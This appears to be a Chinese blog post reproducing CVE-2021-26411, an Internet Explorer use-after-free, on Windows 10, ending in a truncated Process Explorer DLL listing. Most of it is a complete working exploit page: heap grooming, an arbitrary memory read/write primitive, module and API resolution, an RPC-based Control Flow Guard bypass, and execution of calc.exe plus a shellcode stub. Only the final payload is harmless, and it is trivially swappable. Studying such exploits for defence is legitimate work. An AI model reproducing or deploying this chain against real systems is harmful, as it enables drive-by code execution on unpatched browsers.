windows 10下复现CVE-2021-26411漏洞
Posted 将者,智、信、仁、勇、严也。
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了windows 10下复现CVE-2021-26411漏洞相关的知识,希望对你有一定的参考价值。
CVE-2021-26411复现,学习JavaScript之POC源码分析
概述
CVE-2021-26411,该漏洞的原因:removeAttributeNode()触发属性对象nodeValue的valueOf回调,回调期间手动调用clearAttributes(),导致nodeValue保存的BSTR被提前释放。回调返回后,没有检查nodeValue是否存在继续使用该对象,最终导致UAF(Use After Free)。
参考分析链接
国内链接
CVE-2021-26411在野样本中利用RPC绕过CFG缓解技术的研究 (qq.com)
IE浏览器在野0Day CVE-2021-26411漏洞分析 (qq.com)
原作者链接
https://enki.co.kr/blog/2021/02/04/ie_0day.html
平台环境
Win10 1809 17763 ==》 下载地址:https://hellowindows.cn/
商业-批量版 64位 2019-09-17 发布
Windows 10 (business editions), version 1809 (updated Sept 2019) (x64) - DVD (Chinese-Simplified)
文件:cn_windows_10_business_editions_version_1809_updated_sept_2019_x64_dvd_f873d037.iso 我是下载的这个版本复现
大小:5.07GB
SHA1:975f1b3acbeece56b5ad1526345a0657109f4043
VmWare 16.1.1 build-17801498
复现效果展示
POC源码
<!-- IE Double Free 1Day Poc -->
<!doctype html>
<html lang="zh-cmn-Hans">
<head>
<meta http-equiv="Cache-Control" content="no-cache">
</head>
<body>
<script language="javascript">
// 重复字符串
String.prototype.repeat = function (size) return new Array(size + 1).join(this)
function pad0(str)
// 提取倒数第四个字符开始的字符串,效果就是补0
return (\'0000\' + str).slice(-4)
// Access of Resource Using Incompatible Type (\'Type Confusion\')
function alloc1()
// DataView 视图是一个可以从 二进制ArrayBuffer 对象中读写多种数值类型的底层接口,使用它时,不用考虑不同平台的字节序问题。
var view = new DataView(abf)
var str = \'\'
for (var i = 4; i < abf.byteLength - 2; i += 2)
str += \'%u\' + pad0(view.getUint16(i, true).toString(16))
// 创建并返回一个新的属性节点
var result = document.createAttribute(\'alloc\')
// 对escape()编码的字符串进行解码
result.nodeValue = unescape(str)
return result
function alloc2()
// 创建字典对象
var dic1 = new ActiveXObject(\'Scripting.Dictionary\')
var dic2 = new ActiveXObject(\'Scripting.Dictionary\')
// 增加新项,dic.add(key,value)
dic2.add(0, 1)
dic1.add(0, dic2.items())
dic1.add(1, fake)
dic1.add(2, arr)
for (i = 3; i < 0x20010 / 0x10; ++i)
dic1.add(i, 0x12341234)
return dic1.items()
function dump(nv)
// ArrayBuffer 对象用来表示通用的、固定长度的原始二进制数据缓冲区。
// 创建一个0x20010字节的缓冲区,并使用一个 DataView 来引用它
var ab = new ArrayBuffer(0x20010)
var view = new DataView(ab)
for (var i = 0; i < nv.length; ++i)
view.setUint16(i * 2 + 4, nv.charCodeAt(i), true)
return ab
// 在原型对象上定义属性
function Data(type, value)
this.type = type
this.value = value
function setData(i, data)
var arr = new Uint32Array(abf)
arr[i * 4] = data.type
arr[i * 4 + 2] = data.value
function flush()
hd1.nodeValue = (new alloc1()).nodeValue
hd2.nodeValue = 0
// 返回调用该方法的节点的一个副本.
hd2 = hd1.cloneNode()
// 小端序读取
function read(addr, size)
switch (size)
case 8:
return god.getUint8(addr)
case 16:
// getUint16(byteOffset [, littleEndian])
return god.getUint16(addr, true)
case 32:
return god.getUint32(addr, true)
function write(addr, value, size)
switch (size)
case 8:
return god.setUint8(addr, value)
case 16:
return god.setUint16(addr, value, true)
case 32:
return god.setUint32(addr, value, true)
function writeData(addr, data)
for (var i = 0; i < data.length; ++i)
write(addr + i, data[i], 8)
function addrOf(obj)
arr[0] = obj
return read(pArr, 32)
function strcmp(str1, str2)
// typeof 操作符返回一个字符串,表示未经计算的操作数的类型。
str1 = (typeof str1 == \'string\') ? str1 : toStr(str1)
str2 = (typeof str2 == \'string\') ? str2 : toStr(str2)
return str1.toLowerCase() == str2.toLowerCase()
function memcpy(dst, src, size)
for (var i = 0; i < size; ++i)
write(dst + i, read(src + i, 8), 8)
function toStr(addr)
var str = \'\'
while (true)
var c = read(addr, 8)
// 遇到终结符就退出循环
if (c == 0) break
// 返回由指定的 UTF-16 代码单元序列创建的字符串
str += String.fromCharCode(c)
addr++
return str
function newStr(str)
var buffer = createArrayBuffer(str.length + 1)
for (var i = 0; i < str.length; ++i) write(buffer + i, str.charCodeAt(i), 8)
// 写入字符串终结符
write(buffer + i, 0, 8)
return buffer
// PE文件相关操作函数
function getDllBase(base, name)
var tmpValue = 0
var index = 0
var iat = base + read(base + read(base + 60, 32) + 128, 32)
while (true)
var offset = read(iat + index * 20 + 12, 32)
if (strcmp(base + offset, name)) break
index++
var addr = read(iat + index * 20 + 16, 32)
return getBase(read(base + addr, 32))
function getBase(addr)
var addr = addr & 0xffff0000
while (true)
if (isMZ(addr) && isPE(addr)) break
addr -= 0x10000
return addr
function isMZ(addr)
return read(addr, 16) == 0x5a4d
function isPE(addr)
var sizeOfHeaders = read(addr + 60, 32)
if (sizeOfHeaders > 0x600) return null
var addr = addr + sizeOfHeaders
if (read(addr, 32) != 0x4550) return null
return addr
function winVer()
// 返回浏览器的平台和版本信息
var appVersion = window.navigator.appVersion
var ver = 0
// 检测一个字符串是否匹配某个模式,javaScript正则表达式
if (/(Windows 10.0|Windows NT 10.0)/.test(appVersion))
ver = 100
else if (/(Windows 8.1|Windows NT 6.3)/.test(appVersion))
ver = 81
else if (/(Windows 8|Windows NT 6.2)/.test(appVersion))
ver = 80
else
ver = 70
return ver
function createArrayBuffer(size)
var ab = new ArrayBuffer(size)
var bs = read(addrOf(ab) + 0x1c, 32)
// 设置键值对
map.set(bs, ab)
return bs
function getProcAddr(addr, name)
var eat = addr + read(addr + read(addr + 0x3c, 32) + 0x78, 32)
var non = read(eat + 0x18, 32)
var aof = addr + read(eat + 0x1c, 32)
var aon = addr + read(eat + 0x20, 32)
var aono = addr + read(eat + 0x24, 32)
for (var i = 0; i < non; ++i)
var offset = read(aon + i * 4, 32)
if (strcmp(addr + offset, name)) break
var offset = read(aono + i * 2, 16)
return addr + read(aof + offset * 4, 32)
function readyRpcCall(func)
var PRPC_CLIENT_INTERFACE_Buffer = _RPC_MESSAGE.get(msg, \'RpcInterfaceInformation\')
var _MIDL_SERVER_INFO_Buffer = PRPC_CLIENT_INTERFACE.get(PRPC_CLIENT_INTERFACE_Buffer, \'InterpreterInfo\')
var RPC_DISPATCH_TABLE_Buffer = _MIDL_SERVER_INFO_.get(_MIDL_SERVER_INFO_Buffer, \'DispatchTable\')
write(RPC_DISPATCH_TABLE_Buffer, func, 32)
function setArgs(args)
var buffer = createArrayBuffer(48)
for (var i = 0; i < args.length; ++i)
write(buffer + i * 4, args[i], 32)
_RPC_MESSAGE.set(msg, \'Buffer\', buffer)
_RPC_MESSAGE.set(msg, \'BufferLength\', 48)
_RPC_MESSAGE.set(msg, \'RpcFlags\', 0x1000)
return buffer
function callRpcFreeBufferImpl()
var buffer = _RPC_MESSAGE.get(msg, \'Buffer\')
_RPC_MESSAGE.set(rpcFree, \'Buffer\', buffer)
return call(rpcFree)
function callRpcFreeBuffer()
var buffer = _RPC_MESSAGE.get(msg, \'Buffer\')
var result = read(buffer, 32)
callRpcFreeBufferImpl()
return result
function call2(func, args)
readyRpcCall(func)
var buffer = setArgs(args)
call(msg)
map.delete(buffer)
return callRpcFreeBuffer()
function call(addr)
var result = 0
write(paoi + 0x18, addr, 32)
// 错误处理
try
// rpcrt4!NdrServerCall2
xyz.normalize()
catch (error)
result = error.number
write(paoi + 0x18, patt, 32)
return result
function prepareCall(addr, func)
var buf = createArrayBuffer(cattr.size())
var vft = read(patt, 32)
memcpy(addr, patt, cbase.size())
memcpy(buf, vft, cattr.size())
cbase.set(addr, \'pvftable\', buf)
cattr.set(buf, \'normalize\', func)
function createBase()
var isWin7 = winVer() == 70
var size = isWin7 ? 560 : 572
var offset = isWin7 ? 540 : 548
var addr1 = createArrayBuffer(size + cbase.size())
var addr2 = createArrayBuffer(48)
write(addr1 + offset, addr2, 32)
write(addr2 + 40, 8, 32)
write(addr2 + 36, 8, 32)
return
size: size,
addr: addr1
function aos()
var baseObj = createBase()
var addr = baseObj.addr + baseObj.size
var I_RpcTransServerNewConnection = getProcAddr(rpcrt4, \'I_RpcTransServerNewConnection\')
prepareCall(addr, I_RpcTransServerNewConnection)
return read(read(call(addr)-0xf8, 32), 32)
// 自定义结构体的操作
function SymTab(size, sym)
this.size = function()
return size
this.set = function(addr, name, value)
var o = sym[name]
write(addr + o.offset, value, o.size)
this.get = function(addr, name)
var o = sym[name]
return read(addr + o.offset, o.size)
// 构造RPC
function initRpc()
var data = [50,72,0,0,0,0,0,0,52,0,192,0,16,0,68,13,10,1,0,0,0,0,0,0,0,0,72,0,0,0,9,0,72,0,4,0,9,0,72,0,8,0,9,0,72,0,12,0,9,0,72,0,16,0,9,0,72,0,20,0,9,0,72,0,24,0,9,0,72,0,28,0,9,0,72,0,32,0,9,0,72,0,36,0,9,0,72,0,40,0,9,0,72,0,44,0,9,0,112,0,48,0,9,0,0]
var NdrServerCall2 = getProcAddr(rpcrt4, \'NdrServerCall2\')
var NdrOleAllocate = getProcAddr(rpcrt4, \'NdrOleAllocate\')
var NdrOleFree = getProcAddr(rpcrt4, \'NdrOleFree\')
var RPCMessageObject = createArrayBuffer(cbase.size())
var buffer = createArrayBuffer(0x100)
var buffer2 = createArrayBuffer(0x200)
var AttributeVtable = read(patt, 32)
var MSHTMLSymbolBuffer = createArrayBuffer(0x1000)
var TransferSyntaxBuffer = createArrayBuffer(syntaxObject.size())
var PRPC_CLIENT_INTERFACE_Buffer = createArrayBuffer(PRPC_CLIENT_INTERFACE.size())
var _MIDL_SERVER_INFO_Buffer = createArrayBuffer(_MIDL_SERVER_INFO_.size())
var rpcProcStringBuffer = createArrayBuffer(data.length)
writeData(rpcProcStringBuffer, data)
var _MIDL_STUB_DESC_Buffer = createArrayBuffer(_MIDL_STUB_DESC.size())
var RPC_DISPATCH_TABLE_Buffer = createArrayBuffer(RPC_DISPATCH_TABLE.size())
var NdrServerCall2Buffer = createArrayBuffer(4)
write(NdrServerCall2Buffer, NdrServerCall2, 32)
write(MSHTMLSymbolBuffer, osf_vft, 32)
write(MSHTMLSymbolBuffer + 4, 0x89abcdef, 32)
write(MSHTMLSymbolBuffer + 8, 0x40, 32)
cattr.set(MSHTMLSymbolBuffer, \'__vtguard\', cattr.get(AttributeVtable, \'__vtguard\'))
cattr.set(MSHTMLSymbolBuffer, \'SecurityContext\', cattr.get(AttributeVtable, \'SecurityContext\'))
cattr.set(MSHTMLSymbolBuffer, \'JSBind_InstanceOf\', cattr.get(AttributeVtable, \'JSBind_InstanceOf\'))
cattr.set(MSHTMLSymbolBuffer, \'JSBind_TypeId\', cattr.get(AttributeVtable, \'JSBind_TypeId\'))
cattr.set(MSHTMLSymbolBuffer, \'normalize\', NdrServerCall2)
cbase.set(RPCMessageObject, \'pSecurityContext\', RPCMessageObject + 68)
write(RPCMessageObject + 76, 1, 32)
syntaxObject.set(TransferSyntaxBuffer, \'SyntaxVersion.MajorVersion\', 2)
_MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, \'RpcInterfaceInformation\', PRPC_CLIENT_INTERFACE_Buffer)
_MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, \'pfnAllocate\', NdrOleAllocate)
_MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, \'pfnFree\', NdrOleFree)
_MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, \'pFormatTypes\', buffer2)
_MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, \'fCheckBounds\', 1)
_MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, \'Version\', 0x50002)
_MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, \'MIDLVersion\', 0x800025b)
_MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, \'mFlags\', 1)
_MIDL_SERVER_INFO_.set(_MIDL_SERVER_INFO_Buffer, \'pStubDesc\', _MIDL_STUB_DESC_Buffer)
_MIDL_SERVER_INFO_.set(_MIDL_SERVER_INFO_Buffer, \'DispatchTable\', createArrayBuffer(32))
_MIDL_SERVER_INFO_.set(_MIDL_SERVER_INFO_Buffer, \'ProcString\', rpcProcStringBuffer)
_MIDL_SERVER_INFO_.set(_MIDL_SERVER_INFO_Buffer, \'FmtStringOffset\', buffer2)
RPC_DISPATCH_TABLE.set(RPC_DISPATCH_TABLE_Buffer, \'DispatchTableCount\', 1)
RPC_DISPATCH_TABLE.set(RPC_DISPATCH_TABLE_Buffer, \'DispatchTable\', NdrServerCall2Buffer)
PRPC_CLIENT_INTERFACE.set(PRPC_CLIENT_INTERFACE_Buffer, \'DispatchTable\', RPC_DISPATCH_TABLE_Buffer)
PRPC_CLIENT_INTERFACE.set(PRPC_CLIENT_INTERFACE_Buffer, \'InterpreterInfo\', _MIDL_SERVER_INFO_Buffer)
PRPC_CLIENT_INTERFACE.set(PRPC_CLIENT_INTERFACE_Buffer, \'Length\', PRPC_CLIENT_INTERFACE.size())
PRPC_CLIENT_INTERFACE.set(PRPC_CLIENT_INTERFACE_Buffer, \'InterfaceId.SyntaxVersion.MajorVersion\', 1)
PRPC_CLIENT_INTERFACE.set(PRPC_CLIENT_INTERFACE_Buffer, \'TransferSyntax.SyntaxVersion.MajorVersion\', 2)
PRPC_CLIENT_INTERFACE.set(PRPC_CLIENT_INTERFACE_Buffer, \'Flags\', 0x4000000)
_RPC_MESSAGE.set(RPCMessageObject, \'RpcInterfaceInformation\', PRPC_CLIENT_INTERFACE_Buffer)
_RPC_MESSAGE.set(RPCMessageObject, \'TransferSyntax\', TransferSyntaxBuffer)
_RPC_MESSAGE.set(RPCMessageObject, \'Handle\', MSHTMLSymbolBuffer)
_RPC_MESSAGE.set(RPCMessageObject, \'DataRepresentation\', 16)
_RPC_MESSAGE.set(RPCMessageObject, \'RpcFlags\', 0x1000)
_RPC_MESSAGE.set(RPCMessageObject, \'Buffer\', buffer)
_RPC_MESSAGE.set(RPCMessageObject, \'BufferLength\', 48)
return RPCMessageObject
function rpcFree()
var Cbase = createArrayBuffer(cbase.size())
var I_RpcFreeBuffer = getProcAddr(rpcrt4, \'I_RpcFreeBuffer\')
var MSHTMLSymbolBuffer = createArrayBuffer(0x1000)
var AttributeVtable = read(patt, 32)
write(MSHTMLSymbolBuffer, osf_vft, 32)
write(MSHTMLSymbolBuffer + 4, 0x89abcdef, 32)
write(MSHTMLSymbolBuffer + 8, 64, 32)
cattr.set(MSHTMLSymbolBuffer, \'__vtguard\', cattr.get(AttributeVtable, \'__vtguard\'))
cattr.set(MSHTMLSymbolBuffer, \'SecurityContext\', cattr.get(AttributeVtable, \'SecurityContext\'))
cattr.set(MSHTMLSymbolBuffer, \'JSBind_InstanceOf\', cattr.get(AttributeVtable, \'JSBind_InstanceOf\'))
cattr.set(MSHTMLSymbolBuffer, \'JSBind_TypeId\', cattr.get(AttributeVtable, \'JSBind_TypeId\'))
cattr.set(MSHTMLSymbolBuffer, \'normalize\', I_RpcFreeBuffer)
cbase.set(Cbase, \'pvftable\', MSHTMLSymbolBuffer)
cbase.set(Cbase, \'pSecurityContext\', Cbase + 68)
write(Cbase + 76, 1, 32)
return Cbase
function CFGObject(baseAddress)
var PEAddr = isPE(baseAddress)
var eat = PEAddr + 120
var LOAD_CONFIG_DIRECTORY = baseAddress + read(eat + 0x50, 32)
var size = read(LOAD_CONFIG_DIRECTORY, 32)
var sizeOfImage = read(PEAddr + 0x50, 32)
var CFGSymbolTable = new SymTab(0x5c,
\'___guard_check_icall_fptr\':
offset: 72,
size: 32
)
var guard_check_icall_fptr_address = size < CFGSymbolTable.size() ? 0 : CFGSymbolTable.get(LOAD_CONFIG_DIRECTORY, \'___guard_check_icall_fptr\')
this.getCFGAddress = function()
return guard_check_icall_fptr_address
this.getCFGValue = function()
if (size < CFGSymbolTable.size()) return false
var currentCFGValue = read(guard_check_icall_fptr_address, 32)
var isValidAddress = (baseAddress < currentCFGValue) && (currentCFGValue < baseAddress + sizeOfImage)
return !isValidAddress;
function killCfg(addr)
var cfgobj = new CFGObject(addr)
if (!cfgobj.getCFGValue()) return
var guard_check_icall_fptr_address = cfgobj.getCFGAddress()
var KiFastSystemCallRet = getProcAddr(ntdll, \'KiFastSystemCallRet\')
var tmpBuffer = createArrayBuffer(4)
// 修改RPCRT4!__guard_check_icall_fptr的属性为PAGE_EXECUTE_READWRITE
call2(VirtualProtect, [guard_check_icall_fptr_address, 0x1000, 0x40, tmpBuffer])
// 替换rpcrt4!__guard_check_icall_fptr保存的指针,修改ntdll!LdrpValidateUserCallTarget为改为ntdll!KiFastSystemCallRet
// 关闭rpcrt4的CFG检查
write(guard_check_icall_fptr_address, KiFastSystemCallRet, 32)
// 恢复PRCRT4!__gurad_check_icall_fptr内存属性
call2(VirtualProtect, [guard_check_icall_fptr_address, 0x1000, read(tmpBuffer, 32), tmpBuffer])
map.delete(tmpBuffer)
// 表示对象
// 属性:属性值
var cbase = new SymTab(0x60,
\'pvftable\':
offset: 0x0,
size: 32
,
\'pSecurityContext\':
offset: 0x44,
size: 32
)
var cattr = new SymTab(0x32c,
\'__vtguard\':
offset: 0x48,
size: 32
,
\'SecurityContext\':
offset: 0xc8,
size: 32
,
\'JSBind_TypeId\':
offset: 0x160,
size: 32
,
\'JSBind_InstanceOf\':
offset: 0x164,
size: 32
,
\'normalize\':
offset: 0x28c,
size: 32
)
var syntaxObject = new SymTab(0x14,
\'SyntaxVersion.MajorVersion\':
offset: 0x10,
size: 16
)
var PRPC_CLIENT_INTERFACE = new SymTab(0x44,
\'Length\':
offset: 0,
size: 32
,
\'InterfaceId.SyntaxVersion.MajorVersion\':
offset: 20,
size: 16
,
\'TransferSyntax.SyntaxVersion.MajorVersion\':
offset: 40,
size: 16
,
// 保存了runtime库和Stub函数的接口指针
\'DispatchTable\':
offset: 44,
size: 32
,
// 指向MIDL_SERVER_INFO结构
\'InterpreterInfo\':
offset: 60,
size: 32
,
\'Flags\':
offset: 64,
size: 32
)
// 保存了服务端IDL接口信息
var _MIDL_SERVER_INFO_ = new SymTab(0x20,
\'pStubDesc\':
offset: 0,
size: 32
,
// 保存了服务端提供的远程调用例程的函数指针数组
\'DispatchTable\':
offset: 4,
size: 32
,
\'ProcString\':
offset: 8,
size: 32
,
\'FmtStringOffset\':
offset: 12,
size: 32
)
var _MIDL_STUB_DESC = new SymTab(0x50,
\'RpcInterfaceInformation\':
offset: 0,
size: 32
,
\'pfnAllocate\':
offset: 4,
size: 32
,
\'pfnFree\':
offset: 8,
size: 32
,
\'pFormatTypes\':
offset: 32,
size: 32
,
\'fCheckBounds\':
offset: 36,
size: 32
,
\'Version\':
offset: 40,
size: 32
,
\'MIDLVersion\':
offset: 48,
size: 32
,
\'mFlags\':
offset: 64,
size: 32
)
var RPC_DISPATCH_TABLE = new SymTab(12,
\'DispatchTableCount\':
offset: 0,
size: 32
,
\'DispatchTable\':
offset: 4,
size: 32
,
)
var _RPC_MESSAGE = new SymTab(0x2c,
\'Handle\':
offset: 0,
size: 32
,
\'DataRepresentation\':
offset: 4,
size: 32
,
// 存放函数的参数
\'Buffer\':
offset: 8,
size: 32
,
\'BufferLength\':
offset: 12,
size: 32
,
\'TransferSyntax\':
offset: 20,
size: 32
,
// 指向RPC_SERVER_INTERFACE
\'RpcInterfaceInformation\':
offset: 24,
size: 32
,
\'RpcFlags\':
offset: 40,
size: 32
)
var god
// 对象数组
var arr = []
var fake = new ArrayBuffer(0x100)
var abf = new ArrayBuffer(0x20010)
var alloc = alloc2()
// 创建一个HTML 属性对象
var hd0 = document.createAttribute(\'handle\')
var hd1 = document.createAttribute(\'handle\')
var hd2
// 创建一个HTML 元素对象
var ele = document.createElement(\'element\')
var att = document.createAttribute(\'attribute\')
att.nodeValue =
valueOf: function()
hd1.nodeValue = (new alloc1()).nodeValue
// 回调时,清除ele对象绑定的所有属性
ele.clearAttributes()
hd2 = hd1.cloneNode()
ele.setAttribute(\'attribute\', 1337)
ele.setAttributeNode(att)
ele.setAttribute(\'attr\', \'0\'.repeat((0x20010 - 6) / 2))
// 触发valueof函数回调
ele.removeAttributeNode(att)
hd0.nodeValue = alloc
var leak = new Uint32Array(dump(hd2.nodeValue))
var pAbf = leak[6]
var pArr = leak[10]
var VT_I4 = 0x3
var VT_DISPATCH = 0x9
var VT_BYREF = 0x4000
var bufArr = new Array(0x10)
var fakeArr = new Uint32Array(fake)
for (var i = 0; i < 0x10; ++i) setData(i + 1, new Data(VT_BYREF | VT_I4, pAbf + i * 4))
flush()
var ref = new VBArray(hd0.nodeValue)
for (var i = 0; i < 0x10; ++i) bufArr[i] = ref.getItem(i + 1)
ref = null
setData(1, new Data(VT_BYREF | VT_I4, bufArr[4]))
setData(2, new Data(VT_BYREF | VT_I4, bufArr[4] + 0x04))
setData(3, new Data(VT_BYREF | VT_I4, bufArr[4] + 0x1c))
flush()
ref = new VBArray(hd0.nodeValue)
var vt = ref.getItem(1)
var gc = ref.getItem(2)
var bs = ref.getItem(3)
ref = null
for (var i = 0; i < 16; ++i) fakeArr[i] = bufArr[i]
fakeArr[4] = bs + 0x40
fakeArr[16] = vt
fakeArr[17] = gc
fakeArr[24] = 0xffffffff
setData(1, new Data(VT_DISPATCH, bs))
flush()
ref = new VBArray(hd0.nodeValue)
god = new DataView(ref.getItem(1))
ref = null
pArr = read(read(pArr + 0x10, 32) + 0x14, 32) + 0x10
write(read(addrOf(hd0) + 0x18, 32) + 0x28, 0, 32)
var map = new Map()
var jscript9 = getBase(read(addrOf(map), 32))
var rpcrt4 = getDllBase(jscript9, \'rpcrt4.dll\')
var msvcrt = getDllBase(jscript9, \'msvcrt.dll\')
var ntdll = getDllBase(msvcrt, \'ntdll.dll\')
var kernelbase = getDllBase(msvcrt, \'kernelbase.dll\')
var VirtualProtect = getProcAddr(kernelbase, \'VirtualProtect\')
var LoadLibraryExA = getProcAddr(kernelbase, \'LoadLibraryExA\')
var xyz = document.createAttribute(\'xyz\')
var paoi = addrOf(xyz)
var patt = read(addrOf(xyz) + 0x18, 32)
var osf_vft = aos()
var msg = initRpc()
var rpcFree = rpcFree()
killCfg(rpcrt4)
// 调用API,弹出计算器
var kernel32 = call2(LoadLibraryExA,[newStr(\'kernel32.dll\',0,1)])
var WinExec = getProcAddr(kernel32,\'WinExec\')
call2(WinExec,[newStr(\'calc.exe\'),5])
// 调用shellcode
var shellcode = new Uint8Array([0xb8, 0x37, 0x13, 0x00, 0x00, 0xc3])
var msi = call2(LoadLibraryExA, [newStr(\'msi.dll\'), 0, 1]) + 0x5000
var tmpBuffer = createArrayBuffer(4)
call2(VirtualProtect, [msi, shellcode.length, 0x4, tmpBuffer])
writeData(msi, shellcode) // mov eax, 0x1337 ; ret
call2(VirtualProtect, [msi, shellcode.length, read(tmpBuffer, 32), tmpBuffer])
var result = call2(msi, [])
// 根据shellocde的而反汇编结果,这里会弹出0x1337的对话框
alert(result.toString(16))
</script>
</body>
</html>
注意细节:我是本地保存html,然后打开复现的,
C:\\Users\\bonelee\\Desktop\\1809.html
如果是放在服务器下运行然后访问,则不会弹出计算器。但是会有弹窗,如下:
我们使用proc exp采集下数据:
可以看到ie并没有calc的自进程!从其加载的dll里,可以看到有mshtml.dll!
可以看到是svchost出来的。
我们重点看下ie加载的dll清单:
Process: iexplore.exe Pid: 2280 Name Description Company Name Path 6AF0698E-D558-4F6E-9B3C-3716689AF493.2.ver0x0000000000000001.db C:\\ProgramData\\Microsoft\\Windows\\Caches\\6AF0698E-D558-4F6E-9B3C-3716689AF493.2.ver0x0000000000000001.db AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9.1.ver0x0000000000000001.db C:\\Users\\bonelee\\AppData\\Local\\Microsoft\\Windows\\Caches\\AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9.1.ver0x0000000000000001.db DDF571F2-BE98-426D-8288-1A9A39C3FDA2.2.ver0x0000000000000001.db C:\\ProgramData\\Microsoft\\Windows\\Caches\\DDF571F2-BE98-426D-8288-1A9A39C3FDA2.2.ver0x0000000000000001.db advapi32.dll Advanced Windows 32 Base API Microsoft Corporation C:\\Windows\\SysWOW64\\advapi32.dll apphelp.dll 应用程序兼容性客户端库 Microsoft Corporation C:\\Windows\\SysWOW64\\apphelp.dll bcrypt.dll Windows Cryptographic Primitives Library (Wow64) Microsoft Corporation C:\\Windows\\SysWOW64\\bcrypt.dll bcryptprimitives.dll Windows Cryptographic Primitives Library Microsoft Corporation C:\\Windows\\SysWOW64\\bcryptprimitives.dll C_1252.NLS C:\\Windows\\System32\\C_1252.NLS cfgmgr32.dll Configuration Manager DLL Microsoft Corporation C:\\Windows\\SysWOW64\\cfgmgr32.dll clbcatq.dll COM+ Configuration Catalog Microsoft Corporation C:\\Windows\\SysWOW64\\clbcatq.dll combase.dll Microsoft COM for Windows Microsoft Corporation C:\\Windows\\SysWOW64\\combase.dll comctl32.dll 用户体验控件库 Microsoft Corporation C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17763.737_none_588eeadb78ace734\\comctl32.dll comctl32.dll 用户体验控件库 Microsoft Corporation C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.737_none_4d637a531b9a7e51\\comctl32.dll comdlg32.dll Common Dialogs DLL Microsoft Corporation C:\\Windows\\SysWOW64\\comdlg32.dll coml2.dll Microsoft COM for Windows Microsoft Corporation C:\\Windows\\SysWOW64\\coml2.dll CoreMessaging.dll Microsoft CoreMessaging Dll Microsoft Corporation C:\\Windows\\SysWOW64\\CoreMessaging.dll CoreUIComponents.dll Microsoft Core UI Components Dll Microsoft Corporation C:\\Windows\\SysWOW64\\CoreUIComponents.dll crypt32.dll Crypto API32 Microsoft Corporation C:\\Windows\\SysWOW64\\crypt32.dll cryptbase.dll Base cryptographic API DLL Microsoft Corporation C:\\Windows\\SysWOW64\\cryptbase.dll cryptsp.dll Cryptographic Service Provider API Microsoft Corporation C:\\Windows\\SysWOW64\\cryptsp.dll cversions.2.db C:\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db cversions.2.db C:\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db d2d1.dll Microsoft D2D Library Microsoft Corporation C:\\Windows\\SysWOW64\\d2d1.dll d3d11.dll Direct3D 11 Runtime Microsoft Corporation C:\\Windows\\SysWOW64\\d3d11.dll DataExchange.dll Data exchange Microsoft Corporation C:\\Windows\\SysWOW64\\DataExchange.dll dcomp.dll Microsoft DirectComposition Library Microsoft Corporation C:\\Windows\\SysWOW64\\dcomp.dll directmanipulation.dll Microsoft Direct Manipulation Component Microsoft Corporation C:\\Windows\\SysWOW64\\directmanipulation.dll dwmapi.dll Microsoft Desktop Window Manager API Microsoft Corporation C:\\Windows\\SysWOW64\\dwmapi.dll DWrite.dll Microsoft DirectX Typography Services Microsoft Corporation C:\\Windows\\SysWOW64\\DWrite.dll dxgi.dll DirectX Graphics Infrastructure Microsoft Corporation C:\\Windows\\SysWOW64\\dxgi.dll efswrt.dll Storage Protection Windows Runtime DLL Microsoft Corporation C:\\Windows\\SysWOW64\\efswrt.dll gdi32.dll GDI Client DLL Microsoft Corporation C:\\Windows\\SysWOW64\\gdi32.dll gdi32full.dll GDI Client DLL Microsoft Corporation C:\\Windows\\SysWOW64\\gdi32full.dll ieapfltr.dll Microsoft SmartScreen Filter Microsoft Corporation C:\\Windows\\SysWOW64\\ieapfltr.dll ieframe.dll Internet 浏览器 Microsoft Corporation C:\\Windows\\SysWOW64\\ieframe.dll ieframe.dll.mui Internet 浏览器 Microsoft Corporation C:\\Windows\\System32\\zh-CN\\ieframe.dll.mui ieproxy.dll IE ActiveX Interface Marshaling Library Microsoft Corporation C:\\Windows\\SysWOW64\\ieproxy.dll iertutil.dll Internet Explorer 的运行时实用程序 Microsoft Corporation C:\\Windows\\SysWOW64\\iertutil.dll IEShims.dll Internet Explorer Compatibility Shims Microsoft Corporation C:\\Program Files (x86)\\Internet Explorer\\IEShims.dll ieui.dll Internet Explorer UI 引擎 Microsoft Corporation C:\\Windows\\SysWOW64\\ieui.dll iexplore.exe Internet Explorer Microsoft Corporation C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe iexplore.exe.mui Internet Explorer Microsoft Corporation C:\\Program Files\\internet explorer\\zh-CN\\iexplore.exe.mui imageres.dll Windows Image Resource Microsoft Corporation C:\\Windows\\SysWOW64\\imageres.dll imageres.dll.mui Windows Image Resource Microsoft Corporation C:\\Windows\\System32\\en-US\\imageres.dll.mui imm32.dll Multi-User Windows IMM32 API Client DLL Microsoft Corporation C:\\Windows\\SysWOW64\\imm32.dll IPHLPAPI.DLL IP Helper API Microsoft Corporation C:\\Windows\\SysWOW64\\IPHLPAPI.DLL jscript9.dll Microsoft (R) JScript Microsoft Corporation C:\\Windows\\SysWOW64\\jscript9.dll kernel.appcore.dll AppModel API Host Microsoft Corporation C:\\Windows\\SysWOW64\\kernel.appcore.dll kernel32.dll Windows NT BASE API Client DLL Microsoft Corporation C:\\Windows\\SysWOW64\\kernel32.dll KernelBase.dll Windows NT BASE API Client DLL Microsoft Corporation C:\\Windows\\SysWOW64\\KernelBase.dll KernelBase.dll.mui Windows NT 基本 API 客户端 DLL Microsoft Corporation C:\\Windows\\System32\\zh-CN\\KernelBase.dll.mui locale.nls C:\\Windows\\System32\\locale.nls mlang.dll Multi Language Support DLL Microsoft Corporation C:\\Windows\\SysWOW64\\mlang.dll mlang.dll.mui 多语言支持 DLL Microsoft Corporation C:\\Windows\\System32\\zh-CN\\mlang.dll.mui mpr.dll Multiple Provider Router DLL Microsoft Corporation 